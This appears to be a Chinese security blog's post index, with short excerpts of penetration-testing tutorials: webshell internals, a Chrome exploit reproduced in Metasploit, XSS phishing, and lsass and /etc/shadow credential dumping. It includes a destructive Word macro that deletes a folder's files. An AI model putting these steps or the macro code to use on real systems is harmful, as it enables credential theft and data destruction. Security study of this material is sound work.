- 博客(19)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 菜刀虚拟终端原理
菜刀虚拟终端系统命令执行原理分析。菜刀传输恶意代码的方式:通过调用array_map函数,对敏感字符串做字符串拼接和大小写混合,对核心代码做base64加密。代码执行步骤:1.关闭脚本信息报错2.获取当前文件绝对路径3.字符串拼接系统命令4.调用proc_open函数执行拼接的系统命令5.输出结果6.结束脚本
2020-04-08 12:19:34
1599
原创 RDPinception无弹窗递归感染(cobalt strike)
该实验需要在远程登陆桌面服务的时候把驱动器打开,当RDPinception概念出来的时候,许多人都不以为意,认为没人会在登陆RDP时特意把驱动器打开(默认关闭)。正常情况下确实是这样,但是不谈同时维护多台主机的运维人员,即使是普通用户,当他需要本地与远程主机有频繁文件传输时,打开驱动器选项后通过文件简单地拖拽实现本地与远程主机的文件传输无疑是很方便的,毕竟不用像ftp那样还需要搭建服务器。但是这种...
2020-03-04 13:47:23
634
原创 解决kali获取目标会话后信息回显的乱码问题
渗透测试时成功回显了目标会话,这时进入shell执行终端命令是经常的操作。但是如果目标回显的信息呈现中文乱码的话,那真是满满的恶心感!良好的渗透体验是决不会允许这种问题存在的-︵-。其实解决起来也不难。乱码大多是编码的问题。kali终端字体默认是UTF-8,将其改为gb2312就行了。修改前输入指令:修改:修改后重新输入指令:整个人都舒服了(∩_∩)...
2020-02-28 11:56:35
687
原创 CVE-2019-5786漏洞复现
漏洞影响范围:CVE-2019-5786适用于Windows 7 x86的Chrome 72.0.3626.119稳定FileReader UaF攻击。环境kaliwin7 x86Google_Chrome_(32bit)_v72.0.3626.119复现kali启动msf,搜索chrome_filereader利用模块root@kali:~# msfconsole -qmsf5...
2020-02-28 10:48:32
1997
2
原创 宏病毒删除指定文件夹下所有文件
环境:win10office 2016操作新建macroVirus.docx文件打开macroVirus.docx文件找到宏点击“查看宏“,创建新的自定义宏病毒代码:Sub AutoExec () Kill "C:\Users\16679\Desktop\testFolder\*" E = MsgBox("It is a Macros vir...
2020-02-27 23:00:00
654
原创 mysql数据库读写文件
环境:centos7mysql 5.6.47用户:root@localhost条件mysql中涉及到读写操作,必然离不开secure_file_priv参数,它的值限制load data,select … outfile,load_file()函数可作用的文件位置。secure_file_priv:值为NULL表示禁止限制操作值为某一目录,则只能操作该目录下的文件没有值则表示不对...
2020-02-26 19:07:40
4454
4
原创 centos7 BBR加速
操作1,下载一键安装管理脚本:wget -N --no-check-certificate "https://raw.githubusercontent.com/chiakge/Linux-NetSpeed/master/tcp.sh"操作2,赋予tcp.sh执行权限:chmod +x tcp.sh 操作3,执行脚本:./tcp.sh执行效果:输入1,等待自动安装内核(安装...
2020-02-06 19:16:00
1149
原创 基于JS学习正则表达式
基于JS的正则表达式学习利用正则表达式图形化工具来辅助学习在JS中用“//”来声明正则表达式JS正则表达式学习环境:一.正则表达式对象字面量,构造函数实例化正则表达式对象1.字面量2.构造函数加上global属性可以实现全局匹配例如:二.元字符正则表达式由两种基本字符类型组成:1.原义文本字符字符本身表示的意思没有多余的含义。2.元字符有特殊含义的非字母字符...
2019-11-26 23:48:07
178
原创 基于XSS的网页篡改,网页劫持,网页钓鱼
基于XSS的网页篡改,网页劫持,网页钓鱼192.168.80.174服务器上存在漏洞页面xss.php192.168.80.160服务器上有调用的jsxss.php:<?php $op = empty($_GET['op']) ? 'Not entered' : $_GET['op'];echo $op;?>浏览器地址栏构建简单的反射型xss判断是否存在xsshtt...
2019-11-04 13:40:57
6803
原创 攻防演练总结1
攻防演练总结1web渗透弱口令傻瓜版本弱口令:admin/123456 admin/admin@123 admin/abcd1234! sysadmin/123456(即使登录口有验证码和登录次数限制爆破,手工尝试也极容易命中) 稍微好一点的就是账号/密码使用身份证号,邮箱等个人信息组合,攻击者要想爆破此类密码就需要收集目标个人信息制作字典,加大了攻击难度。Sql注入利用方法:...
2019-11-03 10:40:50
5220
原创 linux用户密码获取
linux用户密码获取环境:centos7,kali只有root权限用户才能操作shadow文件cp /etc/shadow /home/password //copy shadow文件到password文件中tar cvf password.tar password //无法直接拖回shadow,打包文件然后拖回压缩包kali自带工具John the rippertar x...
2019-10-30 15:57:37
4303
1
原创 windows10用户密码获取
windows10破解用户密码简单介绍一下lsass.exe,这是是一个系统进程,用于本地安全认证服务器,她为winlogon服务的用户验证生成一个进程。如果身份验证成功,Lsass将生成用户的访问令牌,用于启动初始外壳程序。当用户登录时,lsass.exe会在内存中自动存储用户的登录凭证,攻击者就可以利用这一点来盗取用户的信息。环境:windows10 x64工具:procdump+mim...
2019-10-29 11:33:55
10974
3
原创 linux下解压命令大全
.tar解包:tar xvf FileName.tar打包:tar cvf FileName.tar DirName(注:tar是打包,不是压缩!)———————————————.gz解压1:gunzip FileName.gz解压2:gzip -d FileName.gz压缩:gzip FileName———————————————.tar.xz解压:tar -Jxvf F...
2019-10-26 15:16:58
232
原创 linux与Windows部分下载指令
linux下载wget实例:wget http://192.168.123.219/xxx.tar.gz //下载xxx.tar.gz到当前目录-o 指定下载目录和文件名-c参数表示在网络不稳定的时候可以续传实例:wget http://192.168.123.219/xxx.tar.gz -o ./tmp/yyy.tar.gz//下载xxx.tar.gz到/tmp目录并命名为y...
2019-10-26 14:36:41
249
原创 vps渗透内网win7主机
准备环境:win7:192.168.123.233centos7:45.77.179.138攻击:Metasploit渗透框架Cve-2018-8120本地提权执行文件Windows exploit sugger(漏洞利用建议器)Putty执行文件Lcx (windows下端口转发工具)Portmap (linux下端口转发工具)Saminside (破解系统用户密码)vp...
2019-09-04 09:16:04
1736
3
原创 web渗透测试整理1(跨站脚本)
跨站脚本构建模块1.http://xxx/poll_skimcx.jsp?pollId=425?view=yes&aid=10483&mid=18.www.xxx/item/p/item.html?type=">源码效果9.www.0832xh.com/cmd.asp?act=gettburl&id=18">源码效果:10.https://www.c...
2019-08-08 12:15:10
1339
原创 基于bugkuctf的一次密码加密解密学习
新手,第一次写博客,有点慌!如果有什么问题请指出,虚心接受,共求进步。加密函数:<?phpfunction encrypt($data,$key){ $key = md5('ISCC'); //获取密钥 $x = 0; $len = strlen($data); //待加密字符串...
2019-06-22 10:10:04
365
RDPinception脚本及解释.zip
2020-03-04
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人